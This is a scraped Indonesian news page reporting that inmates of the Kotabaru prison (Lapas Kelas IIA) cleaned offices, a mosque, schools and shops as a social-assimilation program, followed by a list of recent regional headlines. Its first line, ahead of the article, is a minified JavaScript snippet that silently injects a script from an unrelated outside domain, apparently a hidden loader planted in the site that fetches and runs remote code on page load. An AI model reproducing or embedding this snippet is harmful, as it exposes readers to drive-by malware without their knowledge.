(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kotabaru

Asimilasi Kerja Sosial Warga Binaan Lapas Kotabaru Dukung Kebersihan Lingkungan


KANALKALIMANTAN.COM, KOTABARU – Warga Binaan Pemasyarakatan (WBP) Lembaga Pemasyarakatan (Lapas) Kelas IIA Kotabaru melaksanakan program asimilasi kerja sosial pembersihan sampah halaman kantor Dinas Ketenagakerjaan dan Transmigrasi Kotabaru, masjid, sekolah, dan beberapa tempat usaha masyarakat di jalan Hasan Basri, Jumat (20/10/2023).

Kepada Kanalkalimantan.com, Kepala Lapas Kelas IIA, Yosef Benyamin Yembise mengatakan, kegiatan itu merupakan pelaksanaan Perjanjian Kerja Sama (PKS) yang telah disepakati antara Lapas Kotabaru dengan Dinas Lingkungan Hidup Kabupaten Kotabaru.

“Ini tentu sebagai upaya mendukung program Pemerintah Kabupaten Kotabaru, terutama dalam hal kebersihan lingkungan demi menunjang sektor pariwisata,” tutur Yosef.

Baca juga: 12 Jam Pencarian, Bocah 8 Tahun Tenggelam di Sungai Martapura Ditemukan

Dilanjutkan olehnya, pelaksanaannya akan menjadi salah satu langkah konkrit yang dilakukan oleh Lapas Kelas IIA Kotabaru.

“Program ini adalah selain pembinaan kemandirian warga binaan. Tetapi juga bagian dari komitmen kami untuk memberikan kontribusi positif kepada pemerintah daerah dan masyarakat Kotabaru,” jelasnya.

Melalui kegiatan asimilasi, katanya melanjutkan, pihaknya berupaya membantu dalam menjaga kebersihan lingkungan sekitar, sekaligus memberikan edukasi kepada masyarakat dan warga binaan terkait kebersihan lingkungan.

Baca juga: Mahfud MD Soal Dinasti Politik: Cegah Pakai Apa? Bukan Hukum, Lewat Sanksi Sosial

Selain mendukung program kebersihan daerah, juga diharapkan dapat membantu warga binaan Lapas Kelas IIA Kotabaru dalam pengembangan keterampilan kerja dan mempersiapkan mereka untuk kembali ke masyarakat setelah menjalani masa pembinaan di Lapas.

“Semoga kerja sama seperti ini dapat terus berlanjut dan memberikan manfaat yang besar bagi pemerintah daerah dan masyarakat Kotabaru. Kebersihan lingkungan adalah tanggung jawab bersama, dan dengan upaya bersama, kita dapat menjaga keindahan dan kebersihan daerah ini.

Anto salah satu warga binaan yang terlibat dalam giat tersebut mengatakan sangat bersyukur kebersihan di luar Lapas. (Kanalkalimantan.com/muhammad)

Reporter : muhammad
Editor : bie


Muhammad Andi

Recent Posts

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

1 jam ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

2 jam ago

DED Pemasangan ATCS Tugu Adipura Masih Penyempurnaan Kajian

Kadishub Banjarbaru: Setelah Kajian Selesai, Berikutnya Perizinan BPJN dan BPTD Read More

3 jam ago

Hadiri HUT ke-44 Dekranas, Ini Kata Ketua Dekranasda HSU

KANALKALIMANTAN.COM, SOLO - Ketua Dewan Kerajinan Nasional Daerah (Dekranasda) Hulu Sungai Utara (HSU) Gusti Elvira… Read More

4 jam ago

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

5 jam ago

Pastikan Kehadiran Habib Syech ke Kapuas Bersholawat 27 Juni

KANALKALIMANTAN.COM, SOLO - Penjabat (Pj) Bupati Kapuas Erlin Hardi bersilaturahmi ke kediaman Habib Syech bin… Read More

5 jam ago

This website uses cookies.